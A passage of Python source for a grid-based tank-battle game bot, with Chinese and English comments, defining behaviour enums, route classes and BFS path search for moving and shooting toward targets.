return delay def can_block_this_enemy(self, oppBattler): """ 假设自己不移动,对方将不得不绕路,或者他将因此无路可走,那么就算是成功堵住了他 """ delay = self.get_enemy_delay_if_bypass_me(oppBattler) if delay == INFINITY_ROUTE_LENGTH: # 让敌人根本无路可走 return True return (delay >= 2) # 造成两步步以上的延迟,那么就算堵路成功 #{ END 'tank.py' }# #{ BEGIN 'strategy/signal.py' }# class Signal(object, metaclass=UniqueIntEnumMeta): __offset__ = 200 INVALID = -1 # 无效信号 NONE = 0 # 空信号 UNHANDLED = 1 # 未处理团队信号,通常是因为有更紧急的状况而没有运行到相应的处理信号的位置 CANHANDLED = 2 # 未能处理团队信号,通常是因为尝试处理但是发现不合适 PREPARE_FOR_BREAK_BRICK = 11 # 团队信号,准备破墙,先给自己寻找后路 READY_TO_PREPARE_FOR_BREAK_BRICK = 12 # 队员信号,准备好为破墙而凿开两边墙壁 FORCED_TO_BREAK_BRICK = 13 # 团队信号,强制破墙 READY_TO_BREAK_BRICK = 14 # 队员信号,准备要破墙 SUGGEST_TO_BREAK_OVERLAP = 15 # 团队信号,建议马上打破重叠 READY_TO_BREAK_OVERLAP = 16 # 队员信号,准备要主动打破重叠 FORCED_MARCH = 17 # 团队信号,强制行军 READY_TO_FORCED_MARCH = 18 # 队员信号,准备强制行军 SHOULD_LEAVE_TEAMMATE = 19 # 团队信号,需要和队友打破重叠 READY_TO_LEAVE_TEAMMATE = 20 # 队员信号,准备和队友打破重叠 SUGGEST_TO_BACK_AWAY_FROM_BRICK = 21 # 团队信号,建议反向远离墙壁 READY_TO_BACK_AWAY_FROM_BRICK = 22 # 队员信号,准备反向远离墙壁 @staticmethod def is_break(signal): """ 该信号是否意味着沟通停止 也就是是否为未处理或无法处理 """ return signal in ( __class__.INVALID, __class__.UNHANDLED, __class__.CANHANDLED, ) #{ END 'strategy/signal.py' }# #{ BEGIN 'strategy/status.py' }# class Status(object, metaclass=UniqueIntEnumMeta): __offset__ = 100 NONE = 0 # 空状态 AGGRESSIVE = 1 # 侵略性的 STALEMENT = 2 # 僵持的 DEFENSIVE = 3 # 防御性的 WITHDRAW = 4 # 撤退性的 DYING = 5 # 准备要挂了 DIED = 6 # 已经挂了 RELOADING = 9 # 正在装弹,下回合无法射击 ENCOUNT_ENEMY = 17 # 遇到敌人 ENCOUNT_ONE_ENEMY = 18 # 遇到一个敌人 ENCOUNT_TWO_ENEMY = 19 # 遇到两个敌人 OVERLAP_WITH_ENEMY = 20 # 正在和敌人重叠 KEEP_ON_MARCHING = 21 # 继续行军 READY_TO_ATTACK_BASE = 22 # 准备拆基地 READY_TO_FIGHT_BACK = 23 # 准备反击 READY_TO_DODGE = 24 # 准备闪避敌人 READY_TO_KILL_ENEMY = 25 # 准备击杀敌人 READY_TO_BLOCK_ROAD = 26 # 准备堵路 KEEP_ON_OVERLAPPING = 27 # 等待与自己重叠的敌人的决策 WAIT_FOR_MARCHING = 28 # 存在风险,等待进攻 HAS_ENEMY_BEHIND_BRICK = 29 # 隔墙有人 PREVENT_BEING_KILLED = 30 # 为了防止被射击而停下 HUNTING_ENEMY = 31 # 主动追杀敌军 
ACTIVE_DEFENSIVE = 32 # 主动防御状态 WILL_DODGE_TO_LONG_WAY = 33 # 遭遇敌人自己没有炮弹,为了保命而闪避,但是增加了攻击路线长度 OPPOSITE_SHOOTING_WITH_ENEMY = 34 # 正在和敌人对射 READY_TO_BACK_AWAY = 35 # 假装逃跑 READY_TO_CLEAR_A_ROAD_FIRST = 36 # 进攻时预先清除与自己相隔一步的土墙 READY_TO_DOUBLE_KILL_ENEMIES = 37 # 遇到敌人重叠在一起,尝试和两个敌人同归于尽 READY_TO_LEAVE_TEAMMATE = 38 # 准备和队友打破重叠 FACING_TO_ENEMY_BASE = 39 # 正面敌人基地,或者和敌人基地处在同一直线上 READY_TO_FOLLOW_ENEMY = 40 # 准备跟随墙后敌人的移动方向 READY_TO_WITHDRAW = 41 # 准备后撤 GRARD_OUR_BASE = 42 # 已经到达我方基地附近,进入守卫状态 STAY_FOR_GUARDING_OUR_BASE = 43 # 已经到达我方基地附近,准备停留等待 WAIT_FOR_WITHDRAWING = 44 # 等待回防,可能是由于敌人阻挡 MOVE_TO_ANOTHER_GUARD_POINT = 45 # 向着另一个 guard point 移动 ENEMY_MAY_APPEAR_BEHIND_BRICK = 46 # 也许会有敌人出现在墙后 READY_TO_CUT_THROUGH_MIDLINE = 47 # 墙后停止不前时,准备打通中线 TRY_TO_BREAK_ALWAYS_BACK_AWAY = 48 # 尝试打破一直回头的状态 FORCED_MARCHING = 49 # 强制行军,强攻,不考虑某些可能的风险 FORCED_WITHDRAW = 50 # 强制撤退,不考虑可能的风险 READY_TO_PREPARE_FOR_BREAK_BRICK = 51 # 准备为破墙而准备闪避路线 READY_TO_BREAK_BRICK = 52 # 准备破墙 READY_TO_BREAK_OVERLAP = 53 # 准备主动打破重叠 READY_TO_FORCED_MARCH = 54 # 准备主动强攻 FORCED_STOP_TO_PREVENT_TEAM_HURT = 55 # 防止团队间相互攻击而强制停止 READY_TO_BACK_AWAY_FROM_BRICK = 56 # 准备主动反向远离墙壁 HELP_TEAMMATE_ATTACK = 57 # 合作拆家,并且帮助队友进攻 ATTEMPT_TO_KILL_ENEMY = 58 # 主动防御时,尝试击杀敌军,这个状态可以用来记忆行为 BLOCK_ROAD_FOR_OUR_BASE = 59 # 主动防御时,遇到敌方面向基地,但没有炮弹,自己又恰好能阻挡在中间 SACRIFICE_FOR_OUR_BASE = 60 # 主动防御时,遇到敌方下一炮打掉基地,自己又恰好能阻挡 __Status_Name_Cache = None @staticmethod def get_name(status): """ 通过状态值自动判定方法 """ if __class__.__Status_Name_Cache is None: cache = __class__.__Status_Name_Cache = {} for k, v in __class__.__dict__.items(): if not k.startswith("_"): if isinstance(v, int): key = k.title() cache[v] = key cache = __class__.__Status_Name_Cache return cache.get(status, None) # 应该保证一定有方法? 
#{ END 'strategy/status.py' }#

#{ BEGIN 'strategy/label.py' }#

class Label(object, metaclass=UniqueIntEnumMeta):
    """
    Persistent behavior labels attached to tanks across turns.

    Values are offset by ``__offset__`` via the project's
    ``UniqueIntEnumMeta`` metaclass so they never collide with
    ``Status``/``Signal`` values.
    """

    __offset__ = 300

    NONE = 0
    BREAK_OVERLAP_SIMULTANEOUSLY = 1           # enemy will break the overlap at the same time as me
    SIMULTANEOUSLY_SHOOT_TO_BREAK_OVERLAP = 2  # enemy breaks the overlap with us simultaneously by shooting
    IMMEDIATELY_BREAK_OVERLAP_BY_MOVE = 3      # when overlapping with our tank, the enemy immediately breaks the overlap by moving
    KEEP_ON_WITHDRAWING = 4                    # our tank keeps its withdrawing state persistently
    DONT_WITHDRAW = 5                          # forcibly require a team member to stop defending
    ALWAYS_BACK_AWAY = 6                       # our tank always tries to turn back

    __Status_Name_Cache = None

    @staticmethod
    def get_name(status):
        """
        Resolve a label value to its human-readable, title-cased attribute name.

        The int -> name cache is built lazily on first call from the class
        dict (public int attributes only). Returns None for unknown values.
        """
        if __class__.__Status_Name_Cache is None:
            cache = __class__.__Status_Name_Cache = {}
            for k, v in __class__.__dict__.items():
                if not k.startswith("_"):
                    if isinstance(v, int):
                        key = k.title()
                        cache[v] = key
        cache = __class__.__Status_Name_Cache
        return cache.get(status, None)  # should always have a name?

#{ END 'strategy/label.py' }#

#{ BEGIN 'strategy/utils.py' }#

def fake_map_matrix_T_without_enemy(map, mySide):
    """
    Forge a (transposed) map type matrix with all enemy tanks removed.

    WARNING:
        Check that the cell really holds an enemy tank first, because the
        enemy may already be destroyed or tanks of both sides may overlap.
        In that case, if our own tank happens to sit on that position it
        would be wiped out too, and a later assert would fail.
    """
    map_ = map
    oppSide = 1 - mySide
    cMatrixMap = map_.matrix_T.copy()
    for oppTank in map_.tanks[oppSide]:
        if (cMatrixMap[oppTank.xy] == Field.TANK + 1 + oppSide
            or cMatrixMap[oppTank.xy] == Field.MULTI_TANK  # overlapping tanks must be handled too
            ):
            cMatrixMap[oppTank.xy] = Field.EMPTY
    return cMatrixMap


def fake_map_matrix_T_thinking_of_enemy_as_steel(map, mySide):
    """
    Forge a (transposed) map type matrix in which enemy tanks are treated
    as steel walls.

    Used while blocking the road, to estimate whether the enemy still has
    a detour available.
    """
    map_ = map
    oppSide = 1 - mySide
    cMatrixMap = map_.matrix_T.copy()
    for oppTank in map_.tanks[oppSide]:
        if (cMatrixMap[oppTank.xy] == Field.TANK + 1 + oppSide
            or cMatrixMap[oppTank.xy] == Field.MULTI_TANK  # overlapping tanks must be handled too
            ):
            cMatrixMap[oppTank.xy] = Field.STEEL
    return cMatrixMap


def get_manhattan_distance(x1, y1, x2, y2):
    """
    Manhattan distance from (x1, y1) to (x2, y2).
    """
    return np.abs(x1 - x2) + np.abs(y1 - y2)

#{ END 'strategy/utils.py' }#

#{ BEGIN 'strategy/route.py' }#

INFINITY_WEIGHT       = -1  # infinite weight: the node must not be entered at all
INFINITY_ROUTE_LENGTH = -1  # infinite route length: no route was found

DUMMY_ACTION = -2  # placeholder action
NONE_ACTION  = -1  # did nothing last step (i.e. stay); dedicated to the start == end case
MOVE_ACTION  = 0   # last step is marked as a move
SHOOT_ACTION = 1   # last step is marked as a shot

NONE_POINT = (-1, -1)  # no corresponding coordinate


class RouteNode(object):
    """
    A node on a search route.
    -----------------
    After a route has been found by search, this gives an object-oriented
    description of one node on it.

    Property:
        - x              int          x coordinate
        - y              int          y coordinate
        - xy             (int, int)   coordinate pair (x, y)
        - weight         int          node weight, i.e. how many steps it costs
                                      to pass through this node
        - arrivalAction  int          how this node was reached
                                      (MOVE_ACTION / SHOOT_ACTION / ...)
    """
    def __init__(self, x, y, weight=1, arrival_action=DUMMY_ACTION):
        self._x = x
        self._y = y
        self._weight = weight
        self._arrivalAction = arrival_action

    @property
    def x(self):
        return self._x

    @property
    def y(self):
        return self._y

    @property
    def xy(self):
        return (self._x, self._y)

    @property
    def weight(self):
        return self._weight

    @property
    def arrivalAction(self):
        return self._arrivalAction

    def from_shooting_area(self):
        # True if this node was entered through the shooting corridor
        return self._arrivalAction == SHOOT_ACTION

    def from_moving_area(self):
        # True if this node was entered by a regular move
        return self._arrivalAction == MOVE_ACTION

    def __repr__(self):
        return str( (self._x, self._y, self._weight, self._arrivalAction) )

    def __copy__(self):
        # Nodes are effectively immutable, so a shallow copy shares the instance.
        return self

    def __deepcopy__(self, memo=None):
        # BUGFIX: the deepcopy protocol calls __deepcopy__(self, memo);
        # the original signature omitted `memo`, so copy.deepcopy() raised
        # TypeError. All fields are plain ints, so a fresh node suffices.
        return RouteNode(self._x, self._y, self._weight, self._arrivalAction)


class Route(object):
    """
    A search route.
    -----------------
    Object-oriented description of a route produced by the BFS search.

    Property:
        - nodes   [RouteNode]   node chain from start -> end
        - length  int           route length
        - start   (x, y)        start coordinate
        - end     (x, y)        end coordinate

    Method:
        - is_not_found
        - has_block
    """
    def __init__(self, node_chain=None):
        """
        Input:
        ------------------------------------
        - node_chain    head of the node chain, i.e. the node reached last.
          Each node is a list with the following structure:

          def struct Node: [
              "xy":          (int, int)        target coordinate
              "parent":      Node/None         parent node
              "step":        int ( >= 0 )      steps still needed to arrive;
                                               0 means arrived; initialized to weight - 1
              "weight":      const int ( >= 1 ) weight, i.e. steps spent on this node
              "last_action": const int         operation used to reach this node
                                               (here: a move)
          ]
        """
        self._nodeChain = self._get_dummy_head(node_chain)  # prepend a dummy head for easy traversal

    @staticmethod
    def _get_dummy_head(head=None):
        """
        Dummy head prepended to the original node chain head, for easier
        traversal.
        """
        return [
            NONE_POINT,
            head,  # points to the route's end node
            -1,
            -1,
            DUMMY_ACTION,
        ]

    @CachedProperty
    def nodes(self):
        # Walk the parent-linked chain (end -> start) and reverse it so the
        # resulting list runs start -> end.
        nodes = []
        currentNode = self._nodeChain
        while True:
            currentNode = currentNode[1]
            if currentNode is not None:
                x, y = currentNode[0]
                weight = currentNode[3]
                action = currentNode[4]
                nodes.append( RouteNode(x, y, weight, action) )
            else:
                break
        nodes.reverse()
        return nodes

    def is_not_found(self):
        """
        Whether this is an empty route, i.e. no route to the target was found.
        """
        return ( len(self.nodes) == 0 )

    @CachedProperty
    def length(self):
        """
        Route length: the sum of all node weights.

        Returns INFINITY_ROUTE_LENGTH if no route was found.
        """
        if self.is_not_found():
            return INFINITY_ROUTE_LENGTH
        # BUGFIX: np.sum over a generator is deprecated/unsupported by NumPy;
        # the builtin sum gives the intended integer result.
        return sum( node.weight for node in self.nodes )

    @property
    def start(self):
        """
        Start point of the route; NONE_POINT if no route was found.
        """
        if self.is_not_found():
            return NONE_POINT
        return self.nodes[0].xy

    @property
    def end(self):
        """
        End point of the route; NONE_POINT if no route was found.
        """
        if self.is_not_found():
            return NONE_POINT
        return self.nodes[-1].xy

    def has_block(self, field):
        """
        Whether a block-type field (Brick/Base/Tank) lies on this route.

        "Block-type" means the field must be shot once before it disappears.
        """
        assert isinstance(field, (BrickField, BaseField, TankField) ), "%r is not a block field" % field
        for node in self.nodes:
            if node.xy == field.xy:
                if node.weight >= 2 and node.arrivalAction == MOVE_ACTION:
                    # a move was blocked here (extra weight = the shot needed first)
                    return True
                elif node.weight >= 1 and node.arrivalAction == SHOOT_ACTION:
                    # a shot was blocked here
                    return True
        return False

    def __len__(self):
        # NOTE(review): for a not-found route this is -1, which would make
        # len(route) raise ValueError; callers appear to use .length directly.
        return self.length

    def __getitem__(self, idx):
        return self.nodes[idx]

    def __iter__(self):
        yield from self.nodes

    def __contains__(self, xy):
        assert isinstance(xy, tuple) and len(xy) == 2, "(x, y) is required"
        for node in self.nodes:
            if node.xy == xy:
                return True
        return False

    def __repr__(self):
        return "Route(%s)" % self.nodes

    def __copy__(self):
        # Routes are treated as immutable, so a shallow copy shares the instance.
        return self

    def __deepcopy__(self, memo=None):
        # BUGFIX: accept the deepcopy protocol's memo argument (the original
        # signature omitted it, so copy.deepcopy() raised TypeError).
        return Route(deepcopy(self._nodeChain, memo))

#{ END 'strategy/route.py' }#

#{ BEGIN 'strategy/search.py' }#

# y-axis first / vertical first / aggressive
DIRECTIONS_URDL = ( (0, -1), ( 1, 0), (0,  1), (-1, 0) )  # up, right, down, left
DIRECTIONS_ULDR = ( (0, -1), (-1, 0), (0,  1), ( 1, 0) )  # up, left, down, right
DIRECTIONS_DRUL = ( (0,  1), ( 1, 0), (0, -1), (-1, 0) )  # down, right, up, left
DIRECTIONS_DLUR = ( (0,  1), (-1, 0), (0, -1), ( 1, 0) )  # down, left, up, right

# x-axis first / horizontal first / defensive
DIRECTIONS_RULD = ( ( 1, 0), (0, -1), (-1, 0), (0, 1) ) # 右上左下 DIRECTIONS_LURD = ( (-1, 0), (0, -1), ( 1, 0), (0, 1) ) # 左上右下 DIRECTIONS_RDLU = ( ( 1, 0), (0, 1), (-1, 0), (0, -1) ) # 右下左上 DIRECTIONS_LDRU = ( (-1, 0), (0, 1), ( 1, 0), (0, -1) ) # 左下右上 DEFAULT_BLOCK_TYPES = ( Field.STEEL, Field.WATER, ) DEFAULT_DESTROYABLE_TYPES = ( Field.BRICK, ) #------------------------ # 通常需要额外考虑的类型有 # # 1. 两方基地 # 2. 己方坦克和对方坦克 #------------------------ def get_searching_directions(x1, y1, x2=None, y2=None, x_axis_first=False, middle_first=False): """ 获得从 (x1, y1) -> (x2, y2) 最优的搜索方向顺序 Input: - (x1, y1) 起点坐标 - (x2, y2) 终点坐标,可以没有,那么将通过 (x1, y1) 在地图中的相对位置, 对应着左上、左下、右上、右下四个区域,确定最佳的搜索顺序 - x_axis_first bool 是否采用 x 轴方向优先的搜索方式。默认以垂直方向优先, 也就是如果存在到达目标坐标的两条长度相同的路径, 会优先从 y 轴方向移动过去,即先上下移动,后左右移动。 若选择以水平方向优先,则先左右移动,后上下移动。 优先上下移动通常用于侵略,优先左右移动通常用于防御 - middle_first bool 是否采用中路优先的搜索方式。默认不采用,而是优先从边路 搜索,如果边路和中路有距离相等的路径,那么优先从边路 走,如果中路发生冲突,就可以减小被敌人牵制的概率 注: x 轴优先仅仅在中路优先的成立下才有意义,如果是旁路搜索,则对 x 轴优先的 设置是无效的 """ if x2 is None or y2 is None: # 如果 x2, y2 为空,则默认以地图中点作为目标 x2 = MAP_WIDTH // 2 y2 = MAP_HEIGHT // 2 if ( x2 - x1 >= 0 ) and ( y2 - y1 >= 0 ): if middle_first: return DIRECTIONS_DRUL if not x_axis_first else DIRECTIONS_RDLU else: return DIRECTIONS_LDRU elif ( x2 - x1 >= 0 ) and ( y2 - y1 <= 0 ): if middle_first: return DIRECTIONS_URDL if not x_axis_first else DIRECTIONS_RULD else: return DIRECTIONS_LURD elif ( x2 - x1 <= 0 ) and ( y2 - y1 >= 0 ): if middle_first: return DIRECTIONS_DLUR if not x_axis_first else DIRECTIONS_LDRU else: return DIRECTIONS_RDLU elif ( x2 - x1 <= 0 ) and ( y2 - y1 <= 0 ): if middle_first: return DIRECTIONS_ULDR if not x_axis_first else DIRECTIONS_LURD else: return DIRECTIONS_RULD raise Exception def _BFS_search_all_routes_for_move(start, end, map_matrix_T, weight_matrix_T, block_types=DEFAULT_BLOCK_TYPES, x_axis_first=False, middle_first=False): """ BFS 搜索从 start -> end 的所有路径路径,由短到长依次返回 ---------------------------------------------------------------------------- Input: - start 
(int, int) 起始坐标 (x1, y2) - end (int, int) 终点坐标 (x2, y2) ,其对应的 field 类型必须不在 block_types 的定义里,否则查找到的路径为空 - map_matrix_T np.array( [[int]] ) field 类型值的矩阵的转置,坐标形式 (x, y) - weight_matrix_T np.array( [[int]] ) 每个格子对应节点的权重,形状与坐标形式同上 - block_types [int] 不能够移动到的 field 类型 WARNING: 需要自行指定不能够到达的基地、坦克的类型 - x_axis_first bool 是否优先搜索 x 轴方向 - middle_first bool 是否采用中路优先的搜索 Yield From: - routes [Route] 所有可以到达的路径。如果没有搜索到可以到达的路径,则返回空路径 ---------------------------------------------------------------------------- def struct Node: // 定义节点模型 [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,该情况为移动 ] """ x1, y1 = start x2, y2 = end width, height = map_matrix_T.shape # width, height 对应着转置前的 宽高 matrixMap = map_matrix_T matrixWeight = weight_matrix_T matrixCanMoveTo = np.ones_like(matrixMap, dtype=np.bool8) for _type in block_types: matrixCanMoveTo &= (matrixMap != _type) # debug_print("map:\n", matrixMap.T) # debug_print("weight:\n", matrixWeight.T) # debug_print("can move on:\n", matrixCanMoveTo.astype(np.int8).T) startNode = [ (x1, y1), None, 0, # 初始节点本来就已经到达了 0, # 初始节点不耗费步数 NONE_ACTION, ] queue = deque() # queue( [Node] ) matrixMarked = np.zeros_like(matrixMap, dtype=np.bool8) if DEBUG_MODE: matrixDistance = np.full_like(matrixMap, -1) queue.append(startNode) # init _foundRoute = False while len(queue) > 0: node = queue.popleft() if node[2] > 0: # 还剩 step 步 node[2] -= 1 queue.append(node) # 相当于下一个节点 continue x, y = node[0] if (x, y) == end: # 到达终点 _foundRoute = True yield Route(node) continue if matrixMarked[x, y]: continue matrixMarked[x, y] = True if DEBUG_MODE: matrixDistance[x, y] = _get_route_length_by_node_chain(node) for dx, dy in get_searching_directions(x1, x2, y1, y2, x_axis_first=x_axis_first, middle_first=middle_first): x, y = node[0] x3 = x + dx y3 = y + dy if (not (0 <= x3 < width and 0 <= y3 < height) # not in map or not matrixCanMoveTo[x3, 
y3] ): continue weight = matrixWeight[x3, y3] queue.append([ (x3, y3), node, weight-1, weight, MOVE_ACTION, ]) ''' if DEBUG_MODE: debug_print("distance matrix:\n", matrixDistance.T) ''' if not _foundRoute: yield Route() # 空节点 def _BFS_search_all_routes_for_shoot(start, end, map_matrix_T, move_weight_matrix_T, shoot_weight_matrix_T, block_types=DEFAULT_BLOCK_TYPES, destroyable_types=DEFAULT_DESTROYABLE_TYPES, x_axis_first=False, middle_first=False): """ BFS 搜索从 start 开始到击中 end 的所有路径,由短到长依次返回 ---------------------------------------------------------------------------- 实现思路: 通过射击的方式能够比单纯通过移动的方式更快地接近目标,这是显而易见的,毕竟炮弹可以飞行。 于是,将地图划分为两个区域,一个是可以发动射击的区域,它们仅仅与目标处在同一行或同一列的位置上 另一个就是常规的移动可达的区域。搜索过程中对着两种情况下相应的节点权重做区分对待即可。 --------------------------------------------------------------------------- Input: - start (int, int) 起始坐标 (x1, y2) - end (int, int) 终点坐标 (x2, y2) ,其对应的 field 类型必须不在 destroyable_types 的定义里,否则查找到的路径为空 - map_matrix_T np.array( [[int]] ) field 类型值的矩阵的转置,坐标形式 (x, y) - move_weight_matrix_T np.array( [[int]] ) 移动到这个格子所需的步数 - shoot_weight_matrix_T np.array( [[int]] ) 炮弹到达这个格子所需的步数 - block_types [int] 不能够移动到的 field 类型 WARNING: 需要自行指定不能被攻击的基地、坦克的类型 - destroyable_types [int] 能够通过射击行为摧毁的 field 类型,未指定在这个变量里的 所有其他 field 类型均默认视为不可摧毁,在以射击的方式进行 搜索时,遇到这样的 field 会跳过 WARNING: 需要自行制定可以被摧毁的基地、坦克的类型 - x_axis_first bool 是否优先搜索 x 轴方向 - middle_first bool 是否采用中路优先的搜索 Yield From: - routes [Route] 所有可以到达的路径。如果没有搜索到可以到达的路径,则返回空路径 -------------------------------------------------------------------------- def struct Node: // 定义节点模型 [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,射击或移动 ] """ x1, y1 = start x2, y2 = end width, height = map_matrix_T.shape matrixMap = map_matrix_T matrixMoveWeight = move_weight_matrix_T matrixShootWeight = shoot_weight_matrix_T # 哪些位置可以移动到 matrixCanMoveTo = np.ones_like(matrixMap, dtype=np.bool8) for _type in block_types: 
matrixCanMoveTo &= (matrixMap != _type) # 那些位置上的 field 可以被摧毁 matrixCanBeDestroyed = np.zeros_like(matrixMap, dtype=np.bool8) for _type in destroyable_types: matrixCanBeDestroyed |= (matrixMap == _type) # 哪些位置可以对目标发动射击,即 end 向四个方向伸展开的区域 matrixCanShoot = np.zeros_like(matrixMap, dtype=np.bool8) matrixCanShoot[x2, y2] = True for dx, dy in get_searching_directions(x1, y1, x2, y2, x_axis_first=x_axis_first, middle_first=middle_first): x, y = end while True: x += dx y += dy if not (0 <= x < width and 0 <= y < height): break elif matrixMap[x, y] == Field.EMPTY: # 空对象 pass elif matrixMap[x, y] == Field.WATER: continue # 水路不可以发动射击,但是可以射过去 elif not matrixCanBeDestroyed[x, y] and (x, y) != start: break # 打一个补丁,不管怎么样,攻击者原地是可以发动射击的 ... matrixCanShoot[x, y] = True if (x, y) == start: # 已经找到了 start 没有必要再继续找下去了 break # debug_print("map:\n", matrixMap.T) # debug_print("weight of move:\n", matrixMoveWeight.T) # debug_print("weight of shoot:\n", matrixShootWeight.T) # debug_print("can move to:\n", matrixCanMoveTo.astype(np.int8).T) # debug_print("can shoot:\n", matrixCanShoot.astype(np.int8).T) # debug_print("can be destroyed:\n", matrixCanBeDestroyed.astype(np.int8).T) startNode = [ (x1, y1), None, 0, # 初始节点本来就已经到达了 0, # 初始节点不耗费步数 NONE_ACTION, # 对于 start == end 的情况,将返回 startNode,相当于原地等待 ] queue = deque() # queue( [Node] ) matrixMarked = np.zeros_like(matrixMap, dtype=np.bool8) # 标记移动到的位置 if DEBUG_MODE: matrixDistance = np.full_like(matrixMap, -1) queue.append(startNode) # init _foundRoute = False while len(queue) > 0: # if start == (8, 1): # debug_print(start) # debug_print([n[0] for n in queue]) node = queue.popleft() if node[2] > 0: # 还剩 step 步 node[2] -= 1 queue.append(node) # 相当于下一个节点 continue x, y = node[0] if (x, y) == end: _foundRoute = True yield Route(node) continue # 1. 如果当前处在射击区域 # 2. 
或者上回合射击(事实上射击行为必定是可延续的,也就是上回合 canShoot 这回合 # 必定应该继续 canShoot ,但是对于 WaterField 来说,不属于可以发动射击的区域 # 因此,如果上回合射进 WaterField 那么上一个判定条件就会失效。但在这种情况下 # 应该视为射击行为延续,因此需要第二个判定条件) # if matrixCanShoot[x, y] or node[4] == SHOOT_ACTION: # 因为在射击区域中,行为的方向都是单向的,不会出现从射击区域进入移动区域, # 或者从射击的下一步移动回到上一步的情况, # 因此没有必要对射击行为已到达过的节点位置进行检查和标记 if DEBUG_MODE: matrixDistance[x, y] = _get_route_length_by_node_chain(node) # 确定射击方向 dx = np.sign(x2 - x) dy = np.sign(y2 - y) x3 = x + dx y3 = y + dy weight = matrixShootWeight[x3, y3] nextNode = [ # 必定可以保证下一个节点仍然处在射击区域,不会到达地图外, (x3, y3), # 并且下次还会继续进入这个分支,除非已经到达基地 node, weight-1, # 补偿 weight, SHOOT_ACTION, # 标志着上一步处在射击区域内 ] if weight == 0: # 射击的过渡动作,下一个动作和当前动作同时发生 queue.appendleft(nextNode) # 添加到开头,下回合马上继续 else: queue.append(nextNode) else: # 否则为非射击区域,属于常规移动区域 if matrixMarked[x, y]: # 只对移动区域进行标记 continue matrixMarked[x, y] = True if DEBUG_MODE: matrixDistance[x, y] = _get_route_length_by_node_chain(node) for dx, dy in get_searching_directions(x1, y1, x2, y2, x_axis_first=x_axis_first, middle_first=middle_first): x3 = x + dx y3 = y + dy if (not (0 <= x3 < width and 0 <= y3 < height) # not in map or not matrixCanMoveTo[x3, y3] ): continue weight = matrixMoveWeight[x3, y3] if weight == INFINITY_WEIGHT: continue queue.append([ (x3, y3), node, weight-1, weight, MOVE_ACTION, # 标志着上一步处在非射击区域内 ]) if not _foundRoute: yield Route() # 空节点 @memorize def find_all_routes_for_move(start, end, matrix_T, block_types=DEFAULT_BLOCK_TYPES, x_axis_first=False, middle_first=False): """ 搜索移动到目标的所有路径 Input: - matrix_T np.array( [[int]] ) 游戏地图的类型矩阵的转置 Yield From: - route Route """ matrixMap = matrix_T matrixWeight = np.ones_like(matrixMap) matrixWeight[matrixMap == Field.BRICK] = 1 + 1 # 射击一回合,移动一回合 matrixWeight[matrixMap == Field.STEEL] = INFINITY_WEIGHT matrixWeight[matrixMap == Field.WATER] = INFINITY_WEIGHT routes = _BFS_search_all_routes_for_move( start, end, matrixMap, matrixWeight, block_types=block_types, x_axis_first=x_axis_first, middle_first=middle_first) yield from 
routes @memorize def find_all_routes_for_shoot(start, end, matrix_T, block_types=DEFAULT_BLOCK_TYPES, destroyable_types=DEFAULT_DESTROYABLE_TYPES, x_axis_first=False, middle_first=False): """ 搜索移动并射击掉目标的所有路径 输入输出同上 """ matrixMap = matrix_T matrixMoveWeight = np.ones_like(matrixMap) # weight 默认为 1,即移动一回合 matrixMoveWeight[matrixMap == Field.BRICK] = 1 + 1 # 射击一回合,移动一回合 matrixMoveWeight[matrixMap == Field.STEEL] = INFINITY_WEIGHT matrixMoveWeight[matrixMap == Field.WATER] = INFINITY_WEIGHT matrixShootWeight = np.zeros_like(matrixMap) # weight 默认为 0 ,即炮弹可以飞过 matrixShootWeight[matrixMap == Field.BRICK] = 1 + 1 # 射击一回合,冷却一回合 matrixShootWeight[matrixMap == Field.STEEL] = INFINITY_WEIGHT for _type in BASE_FIELD_TYPES: matrixShootWeight[matrixMap == _type] = 1 # 射击一回合,之后就赢了 for _type in TANK_FIELD_TYPES: matrixShootWeight[matrixMap == _type] = 1 + 1 # 射击一回合,冷却一回合 # WARNING: # 这里只是从理论上分析 TANK, BASE 被打掉对应的权重,实际上我们不希望基地和队友 # 被打掉,因此在实际使用时,仅仅在 destroyable_types 中添加敌方的坦克即可 routes = _BFS_search_all_routes_for_shoot( start, end, matrixMap, matrixMoveWeight, matrixShootWeight, block_types=block_types, destroyable_types=destroyable_types, x_axis_first=x_axis_first, middle_first=middle_first) yield from routes def find_shortest_route_for_move(*args, **kwargs): """ 搜索移动到目标的最短路径 """ for route in find_all_routes_for_move(*args, **kwargs): return route # 直接返回第一个 route def find_shortest_route_for_shoot(*args, **kwargs): """ 搜索移动并射击掉目标的最短路径 """ for route in find_all_routes_for_shoot(*args, **kwargs): return route # 直接返回第一个 route def _get_route_length_by_node_chain(node): """ [DEBUG] 传入 node chain head ,计算其所代表的节点链对应的距离 Return: - length int 路线长度,如果是空路线,返回 无穷大长度 """ assert isinstance(node, list) and len(node) == 5 dummyHead = [ NONE_POINT, node, -1, -1, DUMMY_ACTION, ] route = [] node = dummyHead while True: node = node[1] if node is not None: x, y = node[0] weight = node[3] route.append( (x, y, weight) ) else: break if len(route) == 0: return INFINITY_ROUTE_LENGTH return np.sum( r[2] for r in 
route ) #{ END 'strategy/search.py' }# #{ BEGIN 'strategy/evaluate.py' }# def evaluate_aggressive(battler, oppBattler, strict=False, allow_withdraw=True): """ 根据敌我两架坦克的攻击线路长短,衡量当前侵略性 Input: - battler BattleTank - oppBattler BattleTank - strict bool 是否严格依据路线长度和两方基地位置进行评估 如果为 False ,则还会考虑其他的因素 - allow_withdraw bool 是否允许撤退 Return: [status] - Status.AGGRESSIVE 我方处于攻击状态 - Status.DEFENSIVE 我方处于防御状态 - Status.STALEMENT 双方处于僵持状态 - Status.WITHDRAW 我方处于撤退状态 """ map_ = battler._map BattleTank = type(battler) myRoute = battler.get_shortest_attacking_route() oppRoute = oppBattler.get_shortest_attacking_route() # 可能会遇到这种糟糕的情况,队友挡住了去路 5cdde41fd2337e01c79f1284 #-------------------------- if myRoute.is_not_found() or oppRoute.is_not_found(): return Status.AGGRESSIVE # 应该可以认为是侵略吧 # assert not myRoute.is_not_found() and not oppRoute.is_not_found(), "route not found" leadingLength = oppRoute.length - myRoute.length #debug_print(battler, oppBattler, "leading:", 